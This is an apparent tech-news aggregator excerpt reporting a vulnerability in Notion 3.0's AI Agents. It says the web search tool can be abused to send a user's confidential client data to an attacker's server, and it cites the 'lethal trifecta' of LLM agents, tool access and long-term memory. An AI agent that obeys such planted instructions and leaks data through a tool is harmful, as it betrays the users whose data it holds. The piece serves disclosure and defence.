Get the latest tech news
Hidden risk in Notion 3.0 AI agents: Web search tool abuse for data exfiltration
A critical security vulnerability in Notion 3.0's AI Agents demonstrates how the combination of LLM agents, tool access, and long-term memory creates exploitable attack vectors for data exfiltration.
You can personalize or even build teams of Custom Agents that run on triggers or schedules, giving you autonomous assistants that continuously handle tasks like compiling feedback, updating trackers, and triaging requests. The "lethal trifecta," as described by Simon Willison, is the combination of LLM agents, tool access, and long-term memory that together enable powerful but easily exploitable attack vectors. The agent then invokes the web search tool to send this query to the malicious server, where the attacker logs the Notion user's confidential client data.
Or read this on Hacker News